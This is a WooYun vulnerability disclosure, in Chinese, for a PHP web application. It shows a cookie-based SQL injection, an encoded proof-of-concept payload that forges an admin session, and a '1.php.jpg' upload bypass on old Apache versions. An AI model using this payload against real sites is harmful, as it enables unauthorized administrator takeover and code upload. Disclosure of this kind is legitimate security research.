WooYun.org

I:sql注入
fun.get.php文件

static function safecode($msg_val,$msg_type="encode"){
....
$str_right = base64_encode(substr($str_md5_key , -$lng_2_key2));
if($msg_type == "encode"){
			$str_en_id   = base64_encode($msg_val);
			$str_en_code = $str_left . $str_en_id . $str_right;
			$str_return  = str_replace("=" , "" , $str_en_code);
		}else{
			$str_left    = str_replace("=" , "" , $str_left);
			$str_right   = str_replace("=" , "" , $str_right);
			$str_llen    = strlen($str_left);
			$str_rlen    = strlen($str_right);
			$str_len     = strlen($msg_val);
			if($str_len < ($str_llen + $str_rlen)){
				$str_return = "";
			}else{
				$str_return = base64_decode(substr($msg_val , $str_llen , -$str_rlen));//此处只是做了一次base64的解码操作，没做过滤
			}
		}
}

cls.session.db.php文件：

$str_sid = $this->get_cookie("s_id");
if(!empty($str_sid)) {
$str_sid = fun_get::safecode($str_sid,"decode");//解码，没做过滤
			$str_sql = "select * from " . cls_config::DB_PRE . "sys_session where session_id='" . $str_sid . "'";//直接带入sql语句中

II、管理员用户登录
更加深入利用，这里的sql执行查询的是session记录，可以通过伪造参数，达到admin登录。
s_sid这个cookie保存格式： 前缀+base64(sessionid)+后缀
接下来先确认前缀和后缀的内容是什么：
sessionid首先有一个特点是 ip地址+XXXXXXX
这样就能确定base64(sessionid)的前几位是固定不变的，且我们可以获取自己获取得到。利用这个方式可以确定cookie的前缀。
而base64(sessionid）的后几位是动态变化的，所以后缀也能得到。这样中间的内容就是需要注入的代码的base64

cookie中间的利用POC（两侧需要加上真实的前缀和后缀）:
JyB1bmlvbiBzZWxlY3QgMSwyLDMsJ2E6Mjp7czoyOiJpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMDoibG9naW5fdXNlciI7YToxNDp7czozOiJ1aWQiO3M6MToiMSI7czo1OiJ1bmFtZSI7czo1OiJhZG1pbiI7czo0OiJuYW1lIjtzOjU6ImFkbWluIjtzOjg6Imdyb3VwX2lkIjtzOjE6IjAiO3M6OToiZGVwYXJ0X2lkIjtzOjE6IjAiO3M6NDoidHlwZSI7czo3OiJkZWZhdWx0IjtzOjc6InZlcnNpb24iO3M6MDoiIjtzOjM6InNpZCI7czoyODoiMTkyLjE2OC4xNTIuMjE5MTQwMDQ4NjIyNzc4MyI7czoxMzoibGFzdGxvZ2ludGltZSI7czoxOToiMjAxNC0wNS0xOSAxNjoxMDo0NyI7czo3OiJzaG9wX2lkIjtpOjA7czoxMDoidmVyaWZ5X3RlbCI7czoxOiIwIjtzOjEyOiJ2ZXJpZnlfZW1haWwiO3M6MToiMCI7czo1OiJzY29yZSI7aTowO3M6MTA6ImV4cGVyaWVuY2UiO2k6MTt9fScsNSw2Iw
III、上传
后台菜单处上传过滤不完全，可以直接上传1.php.jpg文件到后台。在apache低版本的情况下出现文件解析漏洞，
</code>